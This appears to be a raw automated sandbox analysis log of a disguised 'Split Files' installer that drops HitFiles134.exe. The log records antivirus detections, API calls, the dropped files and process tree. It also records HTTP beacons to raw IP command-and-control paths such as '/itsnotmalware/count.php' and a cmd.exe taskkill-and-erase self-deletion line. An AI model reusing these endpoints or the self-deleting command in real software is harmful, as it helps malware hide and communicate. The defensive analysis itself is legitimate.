Source: 0.3.file.exe.24e15a0.2.unpack | Avira: Label: TR/Patched.Ren.Gen |
Source: 0.0.file.exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen2 |
Source: 1.0.file.tmp.4cc934.1.unpack | Avira: Label: TR/Patched.Ren.Gen |
Source: 0.3.file.exe.23f54dc.5.unpack | Avira: Label: TR/Patched.Ren.Gen |
Source: 0.2.file.exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen2 |
Source: 2.2.HitFiles134.exe.10000000.5.unpack | Avira: Label: TR/Crypt.XPACK.Gen8 |
Source: 1.2.file.tmp.4cc934.1.unpack | Avira: Label: TR/Patched.Ren.Gen |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0045C298 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0045C34C ArcFourCrypt, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0045C364 ArcFourCrypt, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_00403770 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,___std_exception_copy, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_004738D8 FindFirstFileA,FindNextFileA,FindClose, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00451D34 FindFirstFileA,GetLastError, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_004960EC FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00462DD8 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00463254 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0046184C FindFirstFileA,FindNextFileA,FindClose, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_00423E2D FindFirstFileExW, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_1000959D FindFirstFileExW, |
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user~1\AppData\Local\Temp\is-OVJ5O.tmp\ |
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user~1\ |
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user~1\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp |
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user~1\AppData\Local\Temp\ |
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user~1\AppData\Local\ |
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user~1\AppData\ |
Source: unknown | TCP traffic detected without corresponding DNS query: 45.139.105.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: HitFiles134.exe, 00000002.00000002.331582151.00000000017BC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://107.182.129.235/storage/extension.php |
Source: HitFiles134.exe, 00000002.00000002.331582151.00000000017BC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://107.182.129.235/storage/ping.php |
Source: HitFiles134.exe, 00000002.00000002.331582151.00000000017BC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://171.22.30.106/library.php. |
Source: HitFiles134.exe, 00000002.00000002.331582151.00000000017BC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://171.22.30.106/library.php4 |
Source: HitFiles134.exe, 00000002.00000002.331582151.00000000017BC000.00000004.00000020.00020000.00000000.sdmp, HitFiles134.exe, 00000002.00000002.331816078.00000000017F0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte |
Source: file.tmp, 00000001.00000002.333569114.000000000018F000.00000004.00000010.00020000.00000000.sdmp, file.tmp, 00000001.00000002.334374587.0000000004620000.00000004.00001000.00020000.00000000.sdmp, is-ULQSL.tmp.1.dr, is-P2AUO.tmp.1.dr | String found in binary or memory: http://rus.altarsoft.com/split_files.shtml |
Source: file.tmp, 00000001.00000002.333569114.000000000018F000.00000004.00000010.00020000.00000000.sdmp, file.tmp, 00000001.00000002.334374587.0000000004620000.00000004.00001000.00020000.00000000.sdmp, is-7S1TU.tmp.1.dr, is-A3R8N.tmp.1.dr, is-UUBG5.tmp.1.dr, is-NN8RP.tmp.1.dr, is-7O8CS.tmp.1.dr, is-QV8JO.tmp.1.dr, is-JOJ80.tmp.1.dr, is-L1N1D.tmp.1.dr, is-BVH9M.tmp.1.dr, is-3NI9T.tmp.1.dr | String found in binary or memory: http://www.altarsoft.com/split_files.shtml |
Source: file.tmp, file.tmp, 00000001.00000002.333746784.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-S7F6P.tmp.1.dr | String found in binary or memory: http://www.innosetup.com/ |
Source: file.exe, 00000000.00000003.248037528.0000000002420000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.248226312.0000000002338000.00000004.00001000.00020000.00000000.sdmp, file.tmp, file.tmp, 00000001.00000002.333746784.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-S7F6P.tmp.1.dr | String found in binary or memory: http://www.remobjects.com/ps |
Source: file.exe, 00000000.00000003.248037528.0000000002420000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.248226312.0000000002338000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.333746784.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-S7F6P.tmp.1.dr | String found in binary or memory: http://www.remobjects.com/psU |
Source: global traffic | HTTP traffic detected:
GET /itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 1
Host: 45.139.105.171
Connection: Keep-Alive
Cache-Control: no-cache |
Source: global traffic | HTTP traffic detected:
GET /storage/ping.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 0
Host: 107.182.129.235
Connection: Keep-Alive
Cache-Control: no-cache |
Source: global traffic | HTTP traffic detected:
GET /storage/extension.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 1
Host: 107.182.129.235
Connection: Keep-Alive
Cache-Control: no-cache |
Source: global traffic | HTTP traffic detected:
GET /library.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 2
Host: 171.22.30.106
Connection: Keep-Alive
Cache-Control: no-cache |
Source: Yara match | File source: 2.2.HitFiles134.exe.32d0000.3.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.2.HitFiles134.exe.400000.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.2.HitFiles134.exe.32d0000.3.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.2.HitFiles134.exe.400000.1.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000002.00000002.332146458.0000000003330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000002.330440301.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000002.332003406.00000000032D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004093A8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0045476C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040836C |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00466480 |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0047E9B0 |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0046F05C |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0043D2FC |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0044401C |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0045E1DC |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0045A284 |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_004684F8 |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00444714 |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00434874 |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_004849D0 |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00430AB4 |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00444B20 |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00450C90 |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00485904 |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00443A74 |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_00404490 |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_004096F0 |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_004056A0 |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_00406800 |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_00406AA0 |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_00404D40 |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_00405F40 |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_00402F20 |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_004150D3 |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_00415305 |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_004223A9 |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_00419510 |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_00404840 |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_00426850 |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_00410A50 |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_0042AB9A |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_00421C88 |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_0042ACBA |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_00447D2D |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_00428D39 |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_00404F20 |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_1000F670 |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_1000EC61 |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: String function: 00405964 appears 99 times |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: String function: 00406A2C appears 39 times |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: String function: 00403400 appears 52 times |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: String function: 00452618 appears 82 times |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: String function: 00445650 appears 42 times |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: String function: 0040785C appears 37 times |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: String function: 00408B74 appears 45 times |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: String function: 00403494 appears 77 times |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: String function: 004568CC appears 82 times |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: String function: 00445380 appears 44 times |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: String function: 00456AD8 appears 59 times |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: String function: 00403684 appears 163 times |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: String function: 00433A88 appears 32 times |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: String function: 10003C50 appears 34 times |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: String function: 0040F9E0 appears 54 times |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0042F0EC NtdllDefWindowProc_A, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00423AF4 NtdllDefWindowProc_A, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0045614C PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00412548 NtdllDefWindowProc_A, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00476F38 NtdllDefWindowProc_A, |
Source: file.exe | Static PE information: Resource name: RT_VERSION type: COM executable for DOS |
Source: file.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows |
Source: file.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows |
Source: file.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows |
Source: file.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows |
Source: file.tmp.0.dr | Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped |
Source: is-S7F6P.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows |
Source: is-S7F6P.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows |
Source: is-S7F6P.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows |
Source: is-S7F6P.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows |
Source: is-S7F6P.tmp.1.dr | Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped |
Source: HitFiles134.exe.1.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_SYSHEAP, IMAGE_SCN_MEM_PRELOAD, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
Source: _RegDLL.tmp.1.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
Source: unknown | Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe |
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp "C:\Users\user~1\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp" /SL5="$702C6,1650404,162304,C:\Users\user\Desktop\file.exe" |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Process created: C:\Program Files (x86)\Split Files\HitFiles134.exe "C:\Program Files (x86)\Split Files\HitFiles134.exe" |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Process created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\3JCCsnPwg.exe |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "HitFiles134.exe" /f & erase "C:\Program Files (x86)\Split Files\HitFiles134.exe" & exit |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "HitFiles134.exe" /f |
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp "C:\Users\user~1\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp" /SL5="$702C6,1650404,162304,C:\Users\user\Desktop\file.exe" |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Process created: C:\Program Files (x86)\Split Files\HitFiles134.exe "C:\Program Files (x86)\Split Files\HitFiles134.exe" |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Process created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\3JCCsnPwg.exe |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "HitFiles134.exe" /f & erase "C:\Program Files (x86)\Split Files\HitFiles134.exe" & exit |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "HitFiles134.exe" /f |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004093A8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0045476C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Command line argument: `a}{ |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Command line argument: MFE. |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Command line argument: ZK]Z |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00406518 push 00406555h; ret |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00408064 push ecx; mov dword ptr [esp], eax |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004040B5 push eax; ret |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00404185 push 00404391h; ret |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00404206 push 00404391h; ret |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040C218 push eax; ret |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004042E8 push 00404391h; ret |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00404283 push 00404391h; ret |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00408E98 push 00408ECBh; ret |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_004098B4 push 004098F1h; ret |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_004062CC push ecx; mov dword ptr [esp], eax |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_004583E0 push 00458424h; ret |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00410640 push ecx; mov dword ptr [esp], edx |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0040A6C8 push esp; retf |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00412898 push 004128FBh; ret |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_004429EC push ecx; mov dword ptr [esp], ecx |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00450ACC push 00450AFFh; ret |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00456B74 push 00456BACh; ret |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00492C14 push ecx; mov dword ptr [esp], ecx |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00450C90 push ecx; mov dword ptr [esp], eax |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0045EE34 push ecx; mov dword ptr [esp], ecx |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0040CF98 push ecx; mov dword ptr [esp], edx |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00483278 push ecx; mov dword ptr [esp], ecx |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0040546D push eax; ret |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0040F4F8 push ecx; mov dword ptr [esp], edx |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0040553D push 00405749h; ret |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_004055BE push 00405749h; ret |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0040563B push 00405749h; ret |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_004056A0 push 00405749h; ret |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_004311AD push esi; ret |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_0040F4BB push ecx; ret |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0044AC04 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, |
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | File created: C:\Users\user\AppData\Local\Temp\is-CE3AQ.tmp\_isetup\_RegDLL.tmp |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | File created: C:\Users\user\AppData\Local\Temp\is-CE3AQ.tmp\_isetup\_shfoldr.dll |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | File created: C:\Program Files (x86)\Split Files\is-S7F6P.tmp |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | File created: C:\Users\user\AppData\Local\Temp\is-CE3AQ.tmp\_isetup\_iscrypt.dll |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | File created: C:\Program Files (x86)\Split Files\unins000.exe (copy) |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | File created: C:\Program Files (x86)\Split Files\HitFiles134.exe |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | File created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\3JCCsnPwg.exe |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | File created: C:\Users\user\AppData\Local\Temp\is-CE3AQ.tmp\_isetup\_setup64.tmp |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00423B7C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0042414C IsIconic,SetActiveWindow,SetFocus, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00424104 IsIconic,SetActiveWindow, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_004182F4 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_004227CC SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00417508 IsIconic,GetCapture, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_004815E0 IsIconic,GetWindowLongA,ShowWindow,ShowWindow, |
Source: C:\Users\user\Desktop\file.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-CE3AQ.tmp\_isetup\_RegDLL.tmp |
